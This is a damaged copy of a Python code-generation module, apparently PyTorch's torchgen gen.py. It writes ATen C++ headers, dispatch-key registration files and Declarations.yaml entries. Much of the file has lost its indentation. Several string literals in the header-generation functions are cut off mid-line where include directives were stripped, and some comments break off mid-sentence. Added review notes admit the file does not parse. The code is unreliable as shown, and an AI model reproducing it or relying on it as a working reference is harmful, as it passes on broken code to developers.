assert_stmt = f"static_assert({precomputed_template_parameters[i]} == false, {assert_msg});"
# Generate the new object construction block. All state
# except the element that this method sets is copied from the
# object that `this` points to. The value for the element that
# the method sets is taken from a method parameter.
construction_stmts = []
construction_stmts.append(f"{return_ty} ret;")
for j, elem in enumerate(precomputed_elements):
if i == j:
construction_stmts.append(f"ret.{elem.name} = value;")
else:
construction_stmts.append(f"ret.{elem.name} = this->{elem.name};")
construction_stmts.append("return ret;")
construction_block = "\n".join(construction_stmts)
setter_methods.append(f"""
{signature} {{
{assert_stmt}
{construction_block}
}}
""")
setter_methods_decl = "\n".join(setter_methods)
# Meta should return an instance of the struct containing the precomputed elements.
meta_return_template_params = ", ".join(["true"] * len(precomputed_template_parameters))
# This typedef (actually a using statement) is needed so that TORCH_META_FUNC can reuse the return
# type (which has a variable number of template parameters).
meta_return_typedef = f"using meta_return_ty = precompute_out <{meta_return_template_params}>;"
meta_return = "meta_return_ty"
precomputed_decl = f"""
{precompute_template_decl}
struct TORCH_API precompute_out {{
{setter_methods_decl}
{precomputed_elements_decl};
}};"""
else:
meta_return_typedef = ""
precomputed_decl = ""
return f"""\
struct TORCH_API structured_{name} : public {parent_class} {{
{precomputed_decl}
{meta_return_typedef}
{meta_return} meta({args_str});
}};
"""
def needs_backend_select(f: NativeFunction, selector: SelectiveBuilder) -> bool:
name = str(f.func.name.name)
if name.endswith('_like') or name.startswith('new_'):
return False
if f.func.arguments.tensor_options is None:
return False
return selector.is_native_function_selected(f)
# Generates RegisterBackendSelect.cpp, a series of kernels which provide
# specialized computation of dispatch key for operator signatures which cannot
# be easily done automatically using templating.
@dataclass(frozen=True)
class ComputeBackendSelect:
target: Union[
Literal[Target.DEFINITION],
Literal[Target.REGISTRATION]
]
# Selector object to determine which operators to generate
# registration code for.
selector: SelectiveBuilder
@method_with_native_function
def __call__(self, f: NativeFunction) -> Optional[str]:
if not needs_backend_select(f, self.selector):
return None
name = native.name(f.func)
native_sig = NativeSignature(f.func)
native_tensor_args = [
a for a in native_sig.arguments()
if isinstance(a.argument, Argument) and a.argument.type.is_tensor_like()
]
dispatcher_sig = DispatcherSignature.from_schema(f.func)
sig: Union[NativeSignature, DispatcherSignature]
sig = dispatcher_sig
dispatcher_exprs = dispatcher_sig.exprs()
dispatch_key = "c10::computeDispatchKey(dtype, layout, device)"
if self.target is Target.DEFINITION:
# I don't think there's actually a good reason to generate
# these two cases differently
# The first case could probably be improved though- it calls computeDispatchKeySet(),
# which looks at TLS dispatch keys- there should not be any by the time we reach backend select.
if native_tensor_args:
tensor_args = ', '.join(a.name for a in native_tensor_args)
compute_dk = f"""\
DispatchKeySet _dk_set = c10::DispatchKeySet({dispatch_key}) | c10::detail::multi_dispatch_key_set({tensor_args});
DispatchKeySet _dk_mask = c10::DispatchKeySet(DispatchKeySet::FULL_AFTER, DispatchKey::BackendSelect);
DispatchKeySet _dk = c10::impl::computeDispatchKeySet(_dk_set, _dk_mask);"""
else:
compute_dk = f"DispatchKeySet _dk = c10::DispatchKeySet({dispatch_key});"
return f"""\
// aten::{f.func}
C10_ALWAYS_INLINE
{sig.defn(name)} {{
{compute_dk}
return at::_ops::{f.func.name.unambiguous_name()}::redispatch(
_dk, {', '.join(a.expr for a in dispatcher_exprs)});
}}
"""
elif self.target is Target.REGISTRATION:
return f"""m.impl("aten::{f.func.name}", TORCH_FN({name}));"""
else:
assert_never(self.target)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# YAML CODE GENERATION
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def format_yaml(data: object) -> str:
# Ignore alias in Dumper
YamlDumper.ignore_aliases = lambda self, data: True # type: ignore[assignment]
# Support serializing OrderedDict
def dict_representer(dumper: Any, data: Any) -> Any:
return dumper.represent_dict(data.items())
YamlDumper.add_representer(OrderedDict, dict_representer) # type: ignore[no-untyped-call]
# Some yaml parsers (e.g. Haskell's) don't understand line breaks.
# width=1e9 turns off optional line breaks and improves
# the portability of the outputted yaml.
return yaml.dump(data, default_flow_style=False, Dumper=YamlDumper, width=1e9) # type: ignore[no-any-return]
# For some reason, some defaults we write to YAML are written as native
# YAML objects, rather than doing them uniformly as strings. This
# function detects those cases and converts them into native Python
# objects.
def pythonify_default(s: str) -> object:
if s == 'true':
return True
elif s == 'false':
return False
try:
return int(s)
except ValueError:
try:
return float(s)
except ValueError:
return s
# What is a dynamic type? Over time, the semantic meaning of
# dynamic type has degraded to meaninglessness (in the old days,
# it captured dtype-ness of types, but that has gone away with
# the removal of TH). These days, it's mostly the same thing as
def dynamic_type(t: Type) -> str:
if isinstance(t, OptionalType):
return dynamic_type(t.elem)
# also include Tensor[]
if str(t) == 'Tensor':
return 'at::Tensor'
return cpp.argumenttype_type(t, mutable=False, binds='__placeholder__').cpp_type()
def compute_method_of_yaml(variants: Set[Variant]) -> List[str]:
# This is written out explicitly to ensure that Tensor and
# namespace are put into the list in the right order
method_of = ['Type']
if Variant.method in variants:
method_of.append('Tensor')
if Variant.function in variants:
method_of.append('namespace')
return method_of
def compute_returns_yaml(f: NativeFunction) -> Tuple[List[Dict[str, str]], Dict[str, str]]:
# Note [name and field_name]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~
# To understand name_to_field_name, we must first talk about this
# schema:
#
# lstsq.X(Tensor self, Tensor A, *, Tensor(a!) X, Tensor(b!) qr) -> (Tensor(a!) solution, Tensor(b!) QR)
#
# There is something very odd about this schema: it is an out
# variant of the function (that is to say, it will convert into
# at::lstsq_out() in the C++ API), but the names of the output
# return arguments don't match the keyword argument names of
# directly maintain this correspondence in the modeling of function
# schema itself.
#
# See also https://github.com/pytorch/pytorch/issues/43114
name_to_field_name: Dict[str, str] = {}
# Compute the returns field of the YAML entry
names = cpp.return_names(f)
returns = []
for i, (r, name) in enumerate(zip(f.func.returns, names)):
ret = {
'dynamic_type': dynamic_type(r.type),
'name': name,
'type': cpp.return_type(r).cpp_type(),
}
if r.name:
# See Note [name and field_name]
ret['field_name'] = r.name
if f.func.is_out_fn():
name_to_field_name[f.func.arguments.out[i].name] = r.name
returns.append(ret)
return returns, name_to_field_name
# arguments in yaml roughly corresponds to the public C++ API
def compute_cpp_argument_yaml(cpp_a: Binding, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
if isinstance(cpp_a.argument, TensorOptionsArguments):
arg: Dict[str, object] = {
'annotation': None,
'dynamic_type': 'at::TensorOptions',
'is_nullable': False,
'name': cpp_a.name,
'type': cpp_a.type,
'kwarg_only': True,
}
if cpp_a.default is not None:
arg['default'] = cpp_a.default
return arg
elif isinstance(cpp_a.argument, SelfArgument):
raise AssertionError()
elif isinstance(cpp_a.argument, Argument):
return compute_argument_yaml(
cpp_a.argument, schema_order=schema_order,
kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
def compute_argument_yaml(a: Argument, *, schema_order: bool, kwarg_only_set: Set[str],
out_arg_set: Set[str], name_to_field_name: Dict[str, str]) -> object:
arg: Dict[str, object] = {
'annotation': str(a.annotation) if a.annotation else None,
'dynamic_type': dynamic_type(a.type),
'is_nullable': a.type.is_nullable(),
'name': a.name,
'type': cpp.argument_type(a, binds="__placeholder__").cpp_type(),
}
if a.default is not None:
arg['default'] = pythonify_default(cpp.default_expr(a.default, a.type))
if a.name in kwarg_only_set:
arg['kwarg_only'] = True
if a.name in out_arg_set:
arg['output'] = True
arg['allocate'] = True
# See Note [name and field_name]
if a.name in name_to_field_name:
arg['field_name'] = name_to_field_name[a.name]
# Historically, booleans don't get their size recorded, because it
l = a.type.is_list_like()
if l is not None and l.size is not None and str(l.elem) != 'bool':
arg['size'] = l.size
return arg
@with_native_function
def compute_declaration_yaml(f: NativeFunction) -> object:
    """Assemble the complete Declarations.yaml record for one native function.

    The key order of the returned OrderedDict is significant: it is
    serialized as-is and consumers of Declarations.yaml depend on the layout.
    """
    returns, name_to_field_name = compute_returns_yaml(f)
    # Membership sets used by the argument renderers to tag kwarg-only /
    # out arguments.
    kwarg_only_set = set(a.name for a in f.func.arguments.flat_kwarg_only)
    out_arg_set = set(a.name for a in f.func.arguments.out)
    # Arguments as they appear in the public (non-method) C++ signature.
    sig_group = CppSignatureGroup.from_native_function(f, method=False, fallback_binding=False)
    cpp_args = sig_group.signature.arguments()
    arguments = [
        compute_cpp_argument_yaml(
            cpp_a, schema_order=False,
            kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
        for cpp_a in cpp_args
    ]
    # The same arguments again, this time in JIT schema order.
    schema_order_jit_arguments = list(f.func.schema_order_arguments())
    schema_order_arguments = [
        compute_argument_yaml(
            a, schema_order=True,
            kwarg_only_set=kwarg_only_set, out_arg_set=out_arg_set, name_to_field_name=name_to_field_name)
        for a in schema_order_jit_arguments
    ]
    # C++ types of the schema-order arguments, used only to render the
    # signature string below.
    cpp_schema_order_types = [
        r.type for a in schema_order_jit_arguments
        for r in cpp.argument(
            a, method=False, cpp_no_default_args=set(), faithful=False, has_tensor_options=False)
    ]
    cpp_returns = cpp.returns_type(f.func.returns).cpp_type()
    schema_order_cpp_signature = f"{cpp_returns} ({', '.join(cpp_schema_order_types)})"
    # A factory method takes a TensorOptions pack and is not exposed as a
    # Tensor method.
    is_factory_method = any(isinstance(a.argument, TensorOptionsArguments) for a in cpp_args) \
        and Variant.method not in f.variants
    return OrderedDict([
        ('name', cpp.name(f.func)),
        ('operator_name', str(f.func.name.name)),
        ('overload_name', str(f.func.name.overload_name)),
        ('manual_kernel_registration', f.manual_kernel_registration),
        ('category_override', f.category_override if f.category_override is not None else ''),
        ('schema_string', f'aten::{f.func}'),
        ('arguments', arguments),
        ('schema_order_cpp_signature', schema_order_cpp_signature),
        ('schema_order_arguments', schema_order_arguments),
        ('method_of', compute_method_of_yaml(f.variants)),
        ('mode', 'native'),
        ('python_module', '' if f.python_module is None else f.python_module),
        ('returns', returns),
        ('inplace', f.func.name.name.inplace),
        ('is_factory_method', is_factory_method),
        ('abstract', f.is_abstract),
        ('device_guard', f.device_guard),
        ('with_gil', False),
        ('deprecated', False),
        ('has_math_kernel', f.has_composite_implicit_autograd_kernel),
    ])
# See Note [Auto generated composite kernels]
def has_autogenerated_composite_kernel(f: NativeFunction) -> bool:
    """Return True if a composite kernel is auto-generated for this function.

    This is the case for structured operators (directly structured, or
    delegating to a structured op) whose schema kind is functional or
    inplace.
    """
    is_structured = f.structured or f.structured_delegate is not None
    kind = f.func.kind()
    return is_structured and kind in (SchemaKind.functional, SchemaKind.inplace)
@with_native_function_and_indices
def compute_registration_declarations(f: NativeFunction, backend_indices: Dict[DispatchKey, BackendIndex]) -> str:
    """Render one line of RegistrationDeclarations.h.

    Each line is a C++ declaration followed by a ``//`` comment holding a
    JSON blob of metadata consumed by downstream tooling.
    """
    decl_name = dispatcher.name(f.func)
    ret_type = dispatcher.returns_type(f.func.returns).cpp_type_registration_declarations()
    params = ', '.join(
        arg.no_default().decl_registration_declarations()
        for arg in dispatcher.arguments(f.func))
    metadata: Dict[str, str] = {
        'schema': f'aten::{f.func}',
        # TODO: What exactly is the semantics of the 'dispatch' field?
        'dispatch': str({k for k, v in backend_indices.items() if v.has_kernel(f)} != {DispatchKey.CompositeImplicitAutograd}),
        'default': str(f.has_composite_kernel or has_autogenerated_composite_kernel(f))
    }
    return f'{ret_type} {decl_name}({params}); // {json.dumps(metadata)}\n'
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
#
# RUN IT ALL
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def get_custom_build_selector(
        provided_op_registration_allowlist: Optional[List[str]],
        op_selection_yaml_path: Optional[str]) -> SelectiveBuilder:
    """Build the operator-selection policy for a custom (mobile) build.

    Exactly one of the two sources may be supplied: an explicit allowlist of
    operator names, or a path to an op-selection YAML file.  With neither,
    a no-op selector (select everything) is returned.
    """
    assert provided_op_registration_allowlist is None or op_selection_yaml_path is None, (
        "Both provided_op_registration_allowlist and "
        "op_selection_yaml_path can NOT be provided at the "
        "same time.")
    if provided_op_registration_allowlist is not None:
        return SelectiveBuilder.from_legacy_op_registration_allow_list(
            set(provided_op_registration_allowlist),
            True,
            False,
        )
    if op_selection_yaml_path is not None:
        return SelectiveBuilder.from_yaml_path(op_selection_yaml_path)
    return SelectiveBuilder.get_nop_selector()
def pre_group_native_functions(
        native_functions: Sequence[NativeFunction]) -> Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]]:
    """Bucket native functions by schema signature, then by schema kind.

    Asserts that no signature has two functions of the same kind.
    """
    grouped: Dict[FunctionSchema, Dict[SchemaKind, NativeFunction]] = defaultdict(dict)
    for fn in native_functions:
        by_kind = grouped[fn.func.signature()]
        kind = fn.func.kind()
        assert kind not in by_kind
        by_kind[kind] = fn
    return grouped
def get_grouped_native_functions(
        native_functions: Sequence[NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
    """Collapse pre-grouped buckets into NativeFunctionsGroup objects.

    Buckets that do not form a valid group fall back to their individual
    NativeFunctions.
    """
    def collapse(bucket: Dict[SchemaKind, NativeFunction]) -> Sequence[Union[NativeFunction, NativeFunctionsGroup]]:
        group = NativeFunctionsGroup.from_dict(bucket)
        if group is not None:
            return [group]
        return list(bucket.values())

    # TODO: how come ValuesView isn't a Sequence lol
    buckets = pre_group_native_functions(native_functions)
    return list(concatMap(collapse, list(buckets.values())))
def gen_aggregated_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        functions_keys: Set[DispatchKey],
        dispatch_keys: Sequence[DispatchKey],
        rocm: bool,
) -> None:
    """Write the aggregated (one big header per category) ATen headers.

    Counterpart to gen_per_operator_headers; used when the build does not
    request per-operator headers.

    NOTE(review): several single-quoted literals in this copy of the file
    are truncated (lines ending in "['" or "f'"); they presumably held
    '#include <...>' strings before the file was mangled during extraction.
    As written the function does not parse; each damaged site is flagged
    below and must be restored from the original generator before use.
    """
    # headers into a single file
    structured_native_functions = [g for g in grouped_native_functions
                                   if isinstance(g, NativeFunctionsGroup)]
    cpu_fm.write('NativeMetaFunctions.h', lambda: {
        'NativeMetaFunctions_includes': [],
        'NativeMetaFunctions_declarations': list(
            mapMaybe(compute_meta_function_declaration, structured_native_functions)),
    })
    # Split operators into Tensor-method vs free-function declarations.
    method_native_functions = [fn for fn in native_functions
                               if Variant.method in fn.variants]
    non_method_native_functions = [fn for fn in native_functions
                                   if fn not in method_native_functions]
    cpu_fm.write('MethodOperators.h', lambda: {
        'MethodOperators_includes': [],
        'MethodOperators_declarations': list(mapMaybe(ComputeOperators(
            Target.DECLARATION), method_native_functions)),
    })
    cpu_fm.write('Operators.h', lambda: {
        # NOTE(review): truncated literal on the next line ('#include ...' lost).
        'Operators_includes': ['
        'Operators_declarations': list(mapMaybe(ComputeOperators(
            Target.DECLARATION), non_method_native_functions)),
    })
    cpu_fm.write('Functions.h', lambda: {
        'static_dispatch_extra_headers': static_dispatch_extra_headers(static_dispatch_idx),
        # NOTE(review): truncated literal on the next line ('#include ...' lost).
        'Functions_includes': ['
        'Functions_declarations': list(mapMaybe(ComputeFunction(
            static_dispatch_backend_index=static_dispatch_idx), native_functions)),
    })
    cpu_fm.write('NativeFunctions.h', lambda: {
        # NOTE(review): truncated literal on the next line ('#include ...' lost).
        'NativeFunctions_includes': ['
        'NativeFunctions_declarations': list(concatMap(
            # Convert to a set first to remove duplicate kernel names.
            # Backends are allowed to repeat kernel names; only generate the declaration once!
            lambda f: list(OrderedDict.fromkeys(concatMap(
                lambda backend_idx:
                dest.compute_native_function_declaration(f, backend_idx),
                backend_indices.values()))),
            grouped_native_functions)),
    })
    # Per-dispatch-key function headers; CUDA keys go through the CUDA
    # file manager, everything else through the CPU one.
    for dispatch_key in dispatch_keys:
        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
        if dispatch_key in functions_keys:
            if dispatch_key in static_dispatch_keys(static_dispatch_idx):
                # See Note [Avoiding Include Cycles In Static Dispatch]
                inl_headers = ''
            else:
                # NOTE(review): truncated f-string literal on the next line.
                inl_headers = f'
            fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
                'dispatch_key': str(dispatch_key),
                'inline_headers_for_nonstatic_build': inl_headers,
            })
            fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
                'DispatchKeyFunctions_inl_includes': [],
                'dispatch_namespace': dispatch_key.lower(),
                'dispatch_namespaced_declarations': list(concatMap(
                    dest.RegisterDispatchKey(
                        backend_indices[dispatch_key],
                        Target.NAMESPACED_DECLARATION,
                        selector,
                        rocm=rocm,
                        cpp_namespace='at::native',
                        class_method_name=None),
                    grouped_native_functions
                )),
            })
        # Drop the alias so a stale manager cannot leak past this iteration.
        del fm
def gen_per_operator_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        ops_fm: FileManager,
        functions_keys: Set[DispatchKey],
        dispatch_keys: Sequence[DispatchKey],
        rocm: bool,
) -> None:
    """Write per-operator headers under ATen/ops plus thin umbrella headers.

    NOTE(review): several single-quoted literals in this copy of the file
    are truncated (lines ending in "['" or "f'"); they presumably held
    '#include <ATen/ops/...>' strings before the file was mangled.  As
    written the function does not parse; the damaged sites are flagged
    below and must be restored from the original generator before use.
    """
    # For CMake builds, split operator declarations into separate headers in
    # the ATen/ops folder to split up header dependencies
    functions_by_root_name: Dict[str, List[NativeFunction]] = defaultdict(lambda: [])
    for fn in native_functions:
        functions_by_root_name[fn.root_name].append(fn)
    grouped_functions_by_root_name: Dict[str, List[Union[NativeFunction, NativeFunctionsGroup]]] = defaultdict(lambda: [])
    for group in grouped_native_functions:
        name = group.root_name
        grouped_functions_by_root_name[name].append(group)
    # One set of {name}_ops.h / {name}.h / {name}_meta.h / {name}_native.h
    # headers per operator root name.
    for name, functions in functions_by_root_name.items():
        ops_fm.write_with_template(
            f'{name}_ops.h', 'Operator.h', lambda: {
                'declarations': list(mapMaybe(ComputeOperators(
                    Target.DECLARATION), functions)),
            })
        ops_fm.write_with_template(
            f'{name}.h', 'Function.h', lambda: {
                'static_dispatch_ops_headers': list(mapMaybe(
                    lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
                    functions)),
                # NOTE(review): truncated f-string literal on the next line.
                'operator_includes': f'
                'function_definitions': list(mapMaybe(ComputeFunction(
                    static_dispatch_backend_index=static_dispatch_idx), functions)),
            })
        grouped_functions = grouped_functions_by_root_name.get(name, [])
        structured_functions = [fn for fn in grouped_functions
                                if isinstance(fn, NativeFunctionsGroup) and fn.structured]
        is_structured = len(structured_functions) > 0
        if is_structured:
            ops_fm.write_with_template(
                f'{name}_meta.h', 'NativeMetaFunction.h', lambda: {
                    'meta_function_declarations': list(mapMaybe(
                        compute_meta_function_declaration, structured_functions)),
                })
        ops_fm.write_with_template(
            f'{name}_native.h', 'NativeFunction.h', lambda: {
                # NOTE(review): truncated f-string literal on the next line.
                'extra_includes': (f'
                                   if is_structured else []),
                'native_function_declarations': list(concatMap(
                    # Convert to a set first to remove duplicate kernel names.
                    # Backends are allowed to repeat kernel names; only generate the declaration once!
                    lambda f: list(OrderedDict.fromkeys(concatMap(
                        lambda backend_idx:
                        dest.compute_native_function_declaration(f, backend_idx),
                        backend_indices.values()))),
                    grouped_functions)),
            })
    # Umbrella headers that just include the per-operator headers.
    for category, suffix in [
        ('Functions', ''),
        ('Operators', '_ops'),
        ('NativeMetaFunctions', '_meta'),
        ('NativeFunctions', '_native'),
    ]:
        cpu_fm.write(f'{category}.h', lambda: {
            'static_dispatch_extra_headers': [],
            f'{category}_includes': [
                # NOTE(review): truncated f-string literal on the next line.
                f'
                for name in sorted(functions_by_root_name.keys())
            ],
            f'{category}_declarations': [],
        })
    # Per-dispatch-key headers, again one file per operator root name.
    for dispatch_key in dispatch_keys:
        if dispatch_key not in functions_keys:
            continue
        dispatch_namespace = dispatch_key.lower()
        dispatch_names = []
        for name, functions in functions_by_root_name.items():
            grouped_functions = grouped_functions_by_root_name.get(name, [])
            declarations = list(concatMap(
                dest.RegisterDispatchKey(
                    backend_indices[dispatch_key],
                    Target.NAMESPACED_DECLARATION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_functions
            ))
            # Skip operators with no declaration for this dispatch key.
            if len(declarations) == 0:
                continue
            dispatch_names.append(name)
            ops_fm.write_with_template(
                f'{name}_{dispatch_namespace}_dispatch.h',
                'DispatchKeyFunction.h', lambda: {
                    'dispatch_namespace': dispatch_namespace,
                    'dispatch_namespaced_declarations': declarations,
                })
        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
        if dispatch_key in static_dispatch_keys(static_dispatch_idx):
            # See Note [Avoiding Include Cycles In Static Dispatch]
            inl_headers = ''
        else:
            # NOTE(review): truncated f-string literal on the next line.
            inl_headers = f'
        fm.write_with_template(f'{dispatch_key}Functions.h', 'DispatchKeyFunctions.h', lambda: {
            'dispatch_key': str(dispatch_key),
            'inline_headers_for_nonstatic_build': inl_headers,
        })
        fm.write_with_template(f'{dispatch_key}Functions_inl.h', 'DispatchKeyFunctions_inl.h', lambda: {
            'dispatch_namespace': dispatch_namespace,
            'DispatchKeyFunctions_inl_includes': [
                # NOTE(review): truncated f-string literal on the next line.
                f'
                for name in sorted(dispatch_names)
            ],
            'dispatch_namespaced_declarations': [],
        })
        # Drop the alias so a stale manager cannot leak past this iteration.
        del fm
    cpu_fm.write('MethodOperators.h', lambda: {
        'MethodOperators_includes': sorted(
            # NOTE(review): truncated f-string literal on the next line.
            f'
            for name, functions in functions_by_root_name.items()
            if any(Variant.method in fn.variants for fn in functions)
        ),
        'MethodOperators_declarations': [],
    })
def gen_headers(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        core_fm: FileManager,
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        ops_fm: FileManager,
        dispatch_keys: Sequence[DispatchKey],
        functions_keys: Set[DispatchKey],
        rocm: bool,
        per_operator_headers: bool,
) -> None:
    """Generate all ATen headers.

    Dispatches to the per-operator or aggregated header generator, then
    writes the headers that are common to both layouts (TensorBody.h,
    RedispatchFunctions.h, RegistrationDeclarations.h,
    FunctionalInverses.h, aten_interned_strings.h).
    """
    if per_operator_headers:
        gen_per_operator_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            ops_fm=ops_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=rocm,
        )
    else:
        gen_aggregated_headers(
            native_functions=native_functions,
            grouped_native_functions=grouped_native_functions,
            static_dispatch_idx=static_dispatch_idx,
            selector=selector,
            backend_indices=backend_indices,
            cpu_fm=cpu_fm,
            cuda_fm=cuda_fm,
            dispatch_keys=dispatch_keys,
            functions_keys=functions_keys,
            rocm=rocm,
        )

    def static_dispatch_method_headers() -> List[str]:
        # Headers needed by Tensor methods when static dispatch is enabled
        # and headers are per-operator.
        return list(mapMaybe(
            lambda fn: static_dispatch_ops_header(fn, backend_index=static_dispatch_idx),
            [fn for fn in native_functions if Variant.method in fn.variants]))

    core_fm.write('TensorBody.h', lambda: {
        'static_dispatch_ops_headers': (
            static_dispatch_method_headers() if per_operator_headers
            else static_dispatch_extra_headers(static_dispatch_idx, skip_tensor_include=True)),
        'tensor_method_declarations': list(mapMaybe(ComputeTensorMethod(
            target=Target.DECLARATION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
        'tensor_method_definitions': list(mapMaybe(ComputeTensorMethod(
            target=Target.DEFINITION, static_dispatch_backend_index=static_dispatch_idx), native_functions)),
    })
    cpu_fm.write('RedispatchFunctions.h', lambda: {
        'function_redispatch_definitions': list(mapMaybe(ComputeRedispatchFunction(), native_functions)),
    })
    cpu_fm.write('RegistrationDeclarations.h', lambda: {
        'registration_declarations': [compute_registration_declarations(f, backend_indices) for f in native_functions],
    })
    cpu_fm.write('FunctionalInverses.h', lambda: {
        'view_inverse_declarations': list(mapMaybe(gen_functionalization_view_inverse_declaration, native_functions))
    })

    def gen_aten_interned_strings() -> Dict[str, str]:
        # Collect every operator and argument name so they can be interned
        # as symbols in aten_interned_strings.h.
        attrs = set()  # All function argument names
        names = set()  # All ATen function names
        for func in native_functions:
            names.add(str(func.func.name.name))
            # Some operators don't have a functional variant but we still create a
            # symbol for the base name too (original comment truncated in this copy).
            names.add(func.func.name.name.base)
            for arg in func.func.schema_order_arguments():
                attrs.add(arg.name)
        # These would clash with C++ alternative operator tokens:
        # https://en.cppreference.com/w/cpp/language/operator_alternative
        names -= set(['and', 'and_eq', 'bitand', 'bitor', 'compl', 'not',
                      'not_eq', 'or', 'or_eq', 'xor', 'xor_eq'])
        return {
            'aten_symbols': ' \\\n'.join([
                f"_(aten, {name})" for name in sorted(names)
            ]),
            'attr_symbols': ' \\\n'.join([
                f"_(attr, {name})" for name in sorted(attrs)
            ]),
        }

    core_fm.write('aten_interned_strings.h', gen_aten_interned_strings)
def gen_source_files(
        *,
        native_functions: Sequence[NativeFunction],
        grouped_native_functions: Sequence[Union[NativeFunction, NativeFunctionsGroup]],
        static_dispatch_idx: Optional[BackendIndex],
        selector: SelectiveBuilder,
        backend_indices: Dict[DispatchKey, BackendIndex],
        core_fm: FileManager,
        cpu_fm: FileManager,
        cuda_fm: FileManager,
        dispatch_keys: Sequence[DispatchKey],
        functions_keys: Set[DispatchKey],
        rocm: bool,
        force_schema_registration: bool,
        per_operator_headers: bool,
) -> None:
    """Generate the ATen .cpp source files (registrations and definitions).

    NOTE(review): two single-quoted f-string literals in this copy are
    truncated (lines ending in "[f'"); they presumably held
    '#include <ATen/ops/...>' strings.  The damaged sites are flagged below
    and must be restored from the original generator before use.
    """
    # CUDA-only extra headers; swapped for the HIP equivalents under ROCm.
    extra_cuda_headers = '''\
#include <c10/cuda/CUDAGuard.h>
#include <ATen/cuda/ATenCUDAGeneral.h>
#include <ATen/cuda/CUDADevice.h>
#include <ATen/cuda/CUDAContext.h>'''
    if rocm:
        extra_cuda_headers = '''\
#include <ATen/hip/impl/HIPGuardImplMasqueradingAsCUDA.h>
#include <ATen/hip/ATenHIPGeneral.h>
#include <ATen/hip/HIPDevice.h>
#include <ATen/hip/HIPContext.h>'''
    # One Register{DispatchKey}.cpp per dispatch key.
    for dispatch_key in dispatch_keys:
        fm = cuda_fm if is_cuda_dispatch_key(dispatch_key) else cpu_fm
        if per_operator_headers:
            def operator_headers() -> List[str]:
                # Per-operator include list; note this closes over
                # backend_index / dispatch_namespace, which are assigned
                # below before operator_headers() is called.
                headers = []
                for fn in native_functions:
                    is_registered = backend_index.has_kernel(fn) or (
                        fn.structured and dispatch_key in
                        (DispatchKey.Meta, DispatchKey.CompositeExplicitAutograd))
                    if not is_registered:
                        continue
                    headers.append(f"#include <ATen/ops/{fn.root_name}_native.h>")
                    if dispatch_key == DispatchKey.CompositeExplicitAutograd:
                        headers.append(f"#include <ATen/ops/{fn.root_name}.h>")
                    if dispatch_key in functions_keys:
                        headers.append(
                            f"#include <ATen/ops/{fn.root_name}_{dispatch_namespace}_dispatch.h>")
                return sorted(set(headers))
        else:
            def operator_headers() -> List[str]:
                # Aggregated-header variant of the include list.
                headers = ["#include <ATen/NativeFunctions.h>"]
                if dispatch_key == DispatchKey.CompositeExplicitAutograd:
                    headers.append("#include <ATen/Functions.h>")
                if dispatch_key in functions_keys:
                    headers.append(f"#include <ATen/{dispatch_key!s}Functions.h>")
                return headers
        backend_index = backend_indices[dispatch_key]
        dispatch_namespace = str(dispatch_key).lower()
        fm.write_with_template(f'Register{dispatch_key}.cpp', 'RegisterDispatchKey.cpp', lambda: {
            'extra_cuda_headers': extra_cuda_headers if is_cuda_dispatch_key(dispatch_key) else '',
            'external_backend_headers': '',
            'dispatch_headers': dest.gen_registration_headers(backend_index, per_operator_headers, rocm),
            'ops_headers': operator_headers(),
            'DispatchKey': dispatch_key,
            'dispatch_namespace': dispatch_key.lower(),
            'dispatch_helpers': dest.gen_registration_helpers(backend_index),
            'dispatch_namespaced_definitions': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.NAMESPACED_DEFINITION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
            'dispatch_anonymous_definitions': list(concatMap(
                dest.RegisterDispatchKey(
                    backend_index,
                    Target.ANONYMOUS_DEFINITION,
                    selector,
                    rocm=rocm,
                    cpp_namespace='at::native',
                    class_method_name=None),
                grouped_native_functions
            )),
